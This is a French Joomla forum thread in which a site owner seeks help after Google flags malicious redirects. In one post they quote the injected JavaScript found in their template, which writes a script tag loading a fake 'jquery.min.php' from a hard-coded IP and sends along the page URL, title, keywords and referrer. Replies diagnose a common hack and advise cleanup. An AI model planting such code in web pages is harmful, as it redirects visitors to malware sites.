Logiciels malveillants (redirection)

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Logiciels malveillants (redirection)

    Bonjour ,

    google m'annonce que les pages suivantes : http://www.monsite.com/index.php/

    redirigent les internautes vers un site qui comporte des logiciels malveillants. Malheureusement, le code malveillant présent sur la page n'a pu être isolé.
    Le soucis est que c'est la deuxième fois que google m'annonce que cette même page ( index avec un antislash à la fin ?) , et que j'avais juste demandé à google de faire un autre examen de mon site et le soucis est parti , et que j'ai rien changé dans mon site ?

    A savoir que un CrwProtect est déjà installé est que y'a aucun changement au niveau des fichiers .
    pourriez vous m'aider à investir plus pour résoudre ce problème .

    version joomla 3.6.2 - php 5.6

    Merci pour votre aide

  • #2
    Re : Logiciels malveillants (redirection)

    Bonjour,
    google m'annonce que les pages suivantes : http://www.monsite.com/index.php/

    redirigent les internautes vers un site qui comporte des logiciels malveillants. Malheureusement, le code malveillant présent sur la page n'a pu être isolé.
    Toi qui connait la vraie adresse de la page, tu n'arrives pas à le trouver ... et tu voudrais de l'aide en fournissant une url bidon. Tu es vachement optimiste
    UP, le plugin universel à découvrir sur https//up.lomart.fr
    bgMax
    , AdminOrder, MetaData, Zoom, ArtPlug, Custom, Memo, Filter, ... sur http://lomart.fr/extensions

    Commentaire


    • #3
      Re : Logiciels malveillants (redirection)

      désolé, url bidon est juste pour indication , et pour exprimer mon incompréhension par rapport à /index.php/ , si l'url réelle peut aider je peux vous l'envoyer .

      Commentaire


      • #4
        Re : Logiciels malveillants (redirection)

        je pense que j'ai peu trouvé le code en question et qui se trouvait au niveau de l'index de mon template ; le code :

        <script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://62.129.211.23/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

        la question est comment cette injection a-t-elle pu se faire ?

        Commentaire


        • #5
          Re : Logiciels malveillants (redirection)

          la question est comment cette injection a-t-elle pu se faire ?
          Quel template utilises-tu ?
          Lorsque l'on se cogne la tête contre un pot et que cela sonne creux, ça n'est pas forcément le pot qui est vide.
          Confucius

          Commentaire


          • #6
            Re : Logiciels malveillants (redirection)

            un template créé via template toaster 5

            Commentaire


            • #7
              Re : Logiciels malveillants (redirection)

              Envoyé par alpha72 Voir le message
              la question est comment cette injection a-t-elle pu se faire ?
              Bonjour,
              toi seul ayant accès a ton domaine peut répondre a cette question en allant farfouiller dans tes logs

              Je rejoins Lomart, tu nous donnes des théories mais rien de concret, on ne peut que te répondre sur les grandes largeurs ... il y a 1000 et une façon et plusieurs failles possibles ... a commencer par ton poste de travail ... mais on va se répéter

              Tout dépend de ton hébergeur, de tes extensions, de tes mises à jour régulière, de ton template ... etc
              As tu un parefeu éfficace sur ton site web ? CrawlProtect n'etant plus suivi, je te conseille vivement Aesecure
              Sur leur site web, tu auras beaucoup de bonne lecture
              Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
              Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

              Commentaire


              • #8
                Re : Logiciels malveillants (redirection)

                Merci pour vos réponses ;
                le problème est que j'utilise les deux en même temps ( CrawlProtect et Aesecure), j'utilise souvent quickscan d'Aesecure pour essayer de trouver ce qui peut être comme dangereux , touts les fichiers sont verrouillés en écritures , pour l'hébergeur on est sur serveur dédié chez ovh .

                Commentaire


                • #9
                  Re : Logiciels malveillants (redirection)

                  le problème est que j'utilise les deux en même temps ( CrawlProtect et Aesecure)
                  aucun intéret d'en avoir deux

                  l'hébergeur on est sur serveur dédié chez ovh .
                  Tous les hébergeurs ont des logs pour scruter se qu'il se passe sur le site ...

                  j'utilise souvent quickscan d'Aesecure pour essayer de trouver ce qui peut être comme dangereux , touts les fichiers sont verrouillés en écritures
                  Si tu es deja infecté, c'est trop tard .. il faut nettoyer de la cave au grenier avant de rajouter des couches de protection
                  Le quickscan est un belle outil mais il faut savoir interpréter ses résultats ... mais c'est un bon debut
                  Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
                  Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

                  Commentaire


                  • #10
                    Re : Logiciels malveillants (redirection)

                    J'ai déjà fait un nettoyage , en se basant sur la version vierge de Joomla , et en utilisant les mots clés pouvant être comme suspects et ça a marché , je scrute de temps en temps les logs d’accès et je pense que quelque chose m’échappe !
                    Mais là j'avoue que je suis dépassé , un script dans le fichier index du Template , est-ce que c'est une injection via un virus ou via un accès ftp je ne sais pas .
                    j'avoue aussi que j'utilise des modules un peu dépassés tels que Lof ArticlesSlideShow , mod featcategory ,Art News Ticker...

                    Commentaire


                    • #11
                      Re : Logiciels malveillants (redirection)

                      Une autre question , quel rôle pourra utilisé le poste de travail des rédacteurs du site dans une infection et comment cette dernière pourra être réalisée techniquement sachant que les postes sont sous antivirus ?

                      Commentaire


                      • #12
                        Re : Logiciels malveillants (redirection)

                        Bonjour.

                        Pour sûr tout tes templates sont hackés avec ce même code qui est un faux jquery.min.php.

                        C'est un hack hyper classique et généralement (toujours) il est accompagné par d'autres virus.

                        Si tu as un backup récent et sain il serait bon de le restaurer puis de sécuriser ton site.

                        Pour info CP n'est plus du tout suivi et non compatible php 7.

                        Bon nettoyage
                        Christophe (cavo789)
                        Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                        Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                        Commentaire


                        • #13
                          Re : Logiciels malveillants (redirection)

                          Bonjour ,
                          merci cavo pour votre réponse , à vrai dire j'utilise aussi la version gratuite d'Aesecure , que je présume insuffisante .
                          Donc si Cp n'est pas compatible Php7 il va être obsolète, mais personnellement concernant CP il m'est utile par rapport à sa console qui me permet d'avoir les types d'attaques et la gestion des changements au niveau des fichiers et répertoires à ton réel .
                          pour le nettoyage j’essaie de le faire moi même afin d'avoir une certaine expérience dans le domaine .

                          Commentaire


                          • #14
                            Re : Logiciels malveillants (redirection)

                            Salut

                            Ton site était peut-être déjà hacké avant l'install d'aeSecure ou pas à jour ou...

                            Le logiciel est largement suffisant pour protéger un site qui est sain au moment de l'installation et sur lequel tu fais ce qu'il faut pour le garder à jour.

                            Bonne journée
                            Christophe (cavo789)
                            Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                            Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                            Commentaire


                            • #15
                              Re : Logiciels malveillants (redirection)

                              Effectivement mon site été déjà hacké avant Aesecure .
                              Là je suis sur la version 3.6 de joomla .
                              je suis entrain de nettoyer et j'ai trouvé pas mal de code bizarres et de fichiers bizarres, pour les modules et plugins les seuls à jour sont admin tool et akeeba backup ...
                              le script jamss.php cité sur le site d'aesecure m'aide à analyser , je pense que j'ai pas bien fait le nettoyage la première fois.
                              c'est quoi les repertoires dans plugins remeber , stats , p3p et sef ?

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X